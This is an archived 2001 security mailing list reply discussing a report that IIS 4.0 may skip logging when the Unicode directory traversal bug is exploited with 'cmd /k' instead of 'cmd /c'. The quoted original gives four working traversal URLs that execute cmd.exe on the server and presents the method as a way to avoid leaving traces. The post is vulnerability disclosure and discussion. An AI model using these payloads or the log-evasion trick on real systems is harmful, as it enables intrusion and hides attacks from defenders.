OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Pablo Aravena (p.aravenabysecure.com)
Date: Thu Dec 20 2001 - 07:48:45 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    The problem looks like this:

            CMD /K [command] Execute a command and "still active"
            CMD /C [command] Execute a command and then finished.

            If you execute a cmd.exe?/k request this would be in active state
            until his finished this process instead of the cmd.exe?/c request
            that finishes the process inmediatly. Because of this the IIS
    that´s
            not log the process that has not come to an end.
                    

    Atentamente,
    Pablo Aravena Martínez
    Consultor de Seguridad
    BYSECURE CSE S.A.
    PGP FingerPrint: 4109 41C1 A295 75D8 F159 D542 96C5 5E6D 2B08 F28A
    http://www.bysecure.com
    mailto:p.aravenabysecure.com

    > -----Mensaje original-----
    > De: ThEye [SMTP:theye350cc.com]
    > Enviado el: jueves, 20 de diciembre de 2001 0:39
    > Para: vuln-devsecurityfocus.com
    > CC: ndr113350cc.com
    > Asunto: sometimes IIS 4.0 don't write logs.
    >
    > <Hi:
    >
    > I don't know if this problem is documented but i didn't find anything
    > about
    > it anywhere.
    >
    > The problem is the following one:
    >
    > + Problem:
    > When I was playing with "Microsoft IIS and PWS Extended Unicode Directory
    > Transveral Vulnerability" ( BugtraqID = 1806 ) I found that if the
    > attacker
    > uses the "k" option of cmd ( cmd /k ) instead of the "c" option (cmd /c)
    > ,IIS 4.0 (with Extended Unicode Directory Transveral Vulnerability)
    > sometimes don't write logs of the attacker's activity.
    >
    > + Implications:
    > If an attacker uses this vulnerability to crack a web page or anything,
    > eventually no tracks will exist on the attacked server.
    >
    > + Final:
    > In PROBLEM I said "sometimes" because after a high number of requests to
    > "cmd /k" , IIS 4.0 write logs of some requests, still I don't know when
    > and
    > why IIS 4.0 write logs of the "cmd /k" request.
    > Anyone that can confirm or refute this please post it.
    >
    >
    > + Exploit:
    > I tested this problem on Windows NT Server 4.0 with IIS 4.0 just installed
    >
    > ( without any patch ).
    >
    > http://server.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/k+dir
    > http://server.com/scripts/..%c0%af../winnt/system32/cmd.exe?/k+dir
    > http://server.com/msadc/..%c1%pc../winnt/system32/cmd.exe?/k+dir
    > http://server.com/msadc/..%c0%af../winnt/system32/cmd.exe?/k+dir
    >
    > Result: No tracks on log files.
    >
    > + More Information:
    > 1) Microsoft IIS and PWS Extended Unicode Directory Transversal
    >
    > http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id=1806
    > 2) Microsoft Patch prmcan4i
    >
    > http://download.microsoft.com/download/winntsp/Patch/q269862/NT4ALPHA/EN-U
    > S/prmcan4i.exe
    >
    > Roberto Alamos M. (theye350cc.com)
    > www.350cc.com